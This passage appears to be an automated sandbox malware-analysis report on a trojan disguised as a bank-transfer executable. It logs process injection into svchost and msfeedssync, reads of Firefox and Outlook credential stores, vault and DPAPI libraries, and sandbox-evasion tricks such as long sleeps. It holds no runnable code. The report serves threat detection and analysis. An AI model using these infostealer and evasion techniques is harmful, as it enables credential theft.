Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033C1AA3	6_2_033C1AA3
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033CDAC6	6_2_033CDAC6
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033B5910	6_2_033B5910
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03329950	6_2_03329950
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0333B950	6_2_0333B950
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0338D800	6_2_0338D800
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033238E0	6_2_033238E0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033DFF09	6_2_033DFF09
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033DFFB1	6_2_033DFFB1
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03321F92	6_2_03321F92
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_032E3FD5	6_2_032E3FD5
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_032E3FD2	6_2_032E3FD2
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03329EB0	6_2_03329EB0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033D7D73	6_2_033D7D73
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033D1D5A	6_2_033D1D5A
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03323D40	6_2_03323D40
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0333FDC0	6_2_0333FDC0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03399C32	6_2_03399C32
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033DFCF2	6_2_033DFCF2
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C11D90	6_2_02C11D90
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C0AE20	6_2_02C0AE20
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C0CE30	6_2_02C0CE30
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C0AFB9	6_2_02C0AFB9
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C0AF64	6_2_02C0AF64
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C0AF70	6_2_02C0AF70
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C0CC0A	6_2_02C0CC0A
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C0CC10	6_2_02C0CC10
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C1361B	6_2_02C1361B
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C13620	6_2_02C13620
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C15420	6_2_02C15420
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C2BAB0	6_2_02C2BAB0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0322E313	6_2_0322E313
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0322E1F5	6_2_0322E1F5
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0322D778	6_2_0322D778
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0322E6AC	6_2_0322E6AC
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0322CA18	6_2_0322CA18
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0322C9EE	6_2_0322C9EE

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03787E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 037BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03775130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0372B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 037AEA12 appears 86 times
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: String function: 0330B970 appears 280 times
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: String function: 0338EA12 appears 86 times
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: String function: 03355130 appears 58 times
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: String function: 03367E54 appears 111 times
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: String function: 0339F290 appears 105 times
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: String function: 00637DE1 appears 36 times
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: String function: 00650AE3 appears 70 times
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: String function: 00658900 appears 42 times

Source: Transferencia 6997900002017937.exe, 00000000.00000003.1374379827.0000000003763000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Transferencia 6997900002017937.exe
Source: Transferencia 6997900002017937.exe, 00000000.00000003.1376759833.000000000395D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Transferencia 6997900002017937.exe

Source: Transferencia 6997900002017937.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@16/10

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_0069A06A GetLastError,FormatMessageW,

0_2_0069A06A

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_006881CB AdjustTokenPrivileges,CloseHandle,		0_2_006881CB
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_006887E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_006887E1

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_0069B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0069B333

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_006AEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_006AEE0D

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_006A83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_006A83BB

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_00634E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00634E89

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

File created: C:\Users\user\AppData\Local\Temp\aut9BE6.tmp

Jump to behavior

Source: Transferencia 6997900002017937.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: msfeedssync.exe, 00000006.00000003.1828000404.0000000002EBA000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000003.1824455815.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000002.3847343312.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000003.1824321358.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000002.3847343312.0000000002EDC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Transferencia 6997900002017937.exe	Virustotal: Detection: 50%
Source: Transferencia 6997900002017937.exe	ReversingLabs: Detection: 52%

Source: unknown	Process created: C:\Users\user\Desktop\Transferencia 6997900002017937.exe "C:\Users\user\Desktop\Transferencia 6997900002017937.exe"
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Transferencia 6997900002017937.exe"
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	Process created: C:\Windows\SysWOW64\msfeedssync.exe "C:\Windows\SysWOW64\msfeedssync.exe"
Source: C:\Windows\SysWOW64\msfeedssync.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Transferencia 6997900002017937.exe"	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	Process created: C:\Windows\SysWOW64\msfeedssync.exe "C:\Windows\SysWOW64\msfeedssync.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\msfeedssync.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\msfeedssync.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Transferencia 6997900002017937.exe

Static file information: File size 1189888 > 1048576

Source: Transferencia 6997900002017937.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Transferencia 6997900002017937.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Transferencia 6997900002017937.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Transferencia 6997900002017937.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Transferencia 6997900002017937.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Transferencia 6997900002017937.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Transferencia 6997900002017937.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: msfeedssync.pdbUGP source: svchost.exe, 00000001.00000002.1633012882.0000000003019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1632987071.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 6tskSK4rGcXjRtb8E.exe, 00000005.00000002.3847876995.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Transferencia 6997900002017937.exe, 00000000.00000003.1375671292.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Transferencia 6997900002017937.exe, 00000000.00000003.1374758468.0000000003640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1633259152.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1633259152.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1532513784.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1534649917.0000000003500000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000002.3848498428.000000000347E000.00000040.00001000.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000003.1640685653.0000000003134000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000002.3848498428.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000003.1632711486.0000000002F68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Transferencia 6997900002017937.exe, 00000000.00000003.1375671292.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Transferencia 6997900002017937.exe, 00000000.00000003.1374758468.0000000003640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1633259152.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1633259152.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1532513784.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1534649917.0000000003500000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, msfeedssync.exe, 00000006.00000002.3848498428.000000000347E000.00000040.00001000.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000003.1640685653.0000000003134000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000002.3848498428.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000003.1632711486.0000000002F68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msfeedssync.pdb source: svchost.exe, 00000001.00000002.1633012882.0000000003019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1632987071.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 6tskSK4rGcXjRtb8E.exe, 00000005.00000002.3847876995.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: msfeedssync.exe, 00000006.00000002.3849269128.000000000390C000.00000004.10000000.00040000.00000000.sdmp, msfeedssync.exe, 00000006.00000002.3847343312.0000000002E32000.00000004.00000020.00020000.00000000.sdmp, 6tskSK4rGcXjRtb8E.exe, 00000007.00000000.1708461860.000000000283C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1936549559.000000003CC8C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: msfeedssync.exe, 00000006.00000002.3849269128.000000000390C000.00000004.10000000.00040000.00000000.sdmp, msfeedssync.exe, 00000006.00000002.3847343312.0000000002E32000.00000004.00000020.00020000.00000000.sdmp, 6tskSK4rGcXjRtb8E.exe, 00000007.00000000.1708461860.000000000283C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1936549559.000000003CC8C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 6tskSK4rGcXjRtb8E.exe, 00000005.00000002.3847777276.00000000009CF000.00000002.00000001.01000000.00000005.sdmp, 6tskSK4rGcXjRtb8E.exe, 00000007.00000000.1708130909.00000000009CF000.00000002.00000001.01000000.00000005.sdmp

Source: Transferencia 6997900002017937.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Transferencia 6997900002017937.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Transferencia 6997900002017937.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Transferencia 6997900002017937.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Transferencia 6997900002017937.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_00634B37 LoadLibraryA,GetProcAddress,

0_2_00634B37

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00658945 push ecx; ret	0_2_00658958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004170F5 push ebp; ret	1_2_004171B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004170B6 push ecx; iretd	1_2_004170B7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00417152 push ebp; ret	1_2_004171B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040990C push ds; retf	1_2_0040990D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004032A0 push eax; ret	1_2_004032A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00414B89 push ebx; iretd	1_2_00414B8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401450 push esi; retf 89E0h	1_2_00401545
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418C2D push ss; retf	1_2_00418CBA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040BD8D push eax; retf	1_2_0040BD8E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00417E53 push es; ret	1_2_00417E82
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00417ED2 push esi; iretd	1_2_00417EDA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00415FE3 push esi; retf	1_2_00415FEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370225F pushad ; ret	1_2_037027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037027FA pushad ; ret	1_2_037027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037309AD push ecx; mov dword ptr [esp], ecx	1_2_037309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370283D push eax; iretd	1_2_03702858
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_032E225F pushad ; ret	6_2_032E27F9
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_032E27FA pushad ; ret	6_2_032E27F9
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033109AD push ecx; mov dword ptr [esp], ecx	6_2_033109B6
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_032E283D push eax; iretd	6_2_032E2858
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_032E1368 push eax; iretd	6_2_032E1369
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C06669 push ds; retf	6_2_02C0666A
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C08AEA push eax; retf	6_2_02C08AEB
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C14BB0 push es; ret	6_2_02C14BDF
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C2080D push edi; ret	6_2_02C2080E
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C14C2F push esi; iretd	6_2_02C14C37
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C12D40 push esi; retf	6_2_02C12D4B
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C1DADD push ecx; retf	6_2_02C1DADE
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C118E6 push ebx; iretd	6_2_02C118E7
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C13EAF push ebp; ret	6_2_02C13F0E

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_006348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_006348D7
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_006B5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_006B5376

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_00653187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00653187

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	API/Special instruction interceptor: Address: E5448C
Source: C:\Windows\SysWOW64\msfeedssync.exe	API/Special instruction interceptor: Address: 7FF84F7AD324
Source: C:\Windows\SysWOW64\msfeedssync.exe	API/Special instruction interceptor: Address: 7FF84F7AD7E4
Source: C:\Windows\SysWOW64\msfeedssync.exe	API/Special instruction interceptor: Address: 7FF84F7AD944
Source: C:\Windows\SysWOW64\msfeedssync.exe	API/Special instruction interceptor: Address: 7FF84F7AD504
Source: C:\Windows\SysWOW64\msfeedssync.exe	API/Special instruction interceptor: Address: 7FF84F7AD544
Source: C:\Windows\SysWOW64\msfeedssync.exe	API/Special instruction interceptor: Address: 7FF84F7AD1E4
Source: C:\Windows\SysWOW64\msfeedssync.exe	API/Special instruction interceptor: Address: 7FF84F7B0154
Source: C:\Windows\SysWOW64\msfeedssync.exe	API/Special instruction interceptor: Address: 7FF84F7ADA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0377096E rdtsc

1_2_0377096E

Source: C:\Windows\SysWOW64\msfeedssync.exe	Window / User API: threadDelayed 1508			Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Window / User API: threadDelayed 8466			Jump to behavior

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-102374

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	API coverage: 4.7 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\msfeedssync.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\msfeedssync.exe TID: 1836	Thread sleep count: 1508 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe TID: 1836	Thread sleep time: -3016000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe TID: 1836	Thread sleep count: 8466 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe TID: 1836	Thread sleep time: -16932000s >= -30000s	Jump to behavior
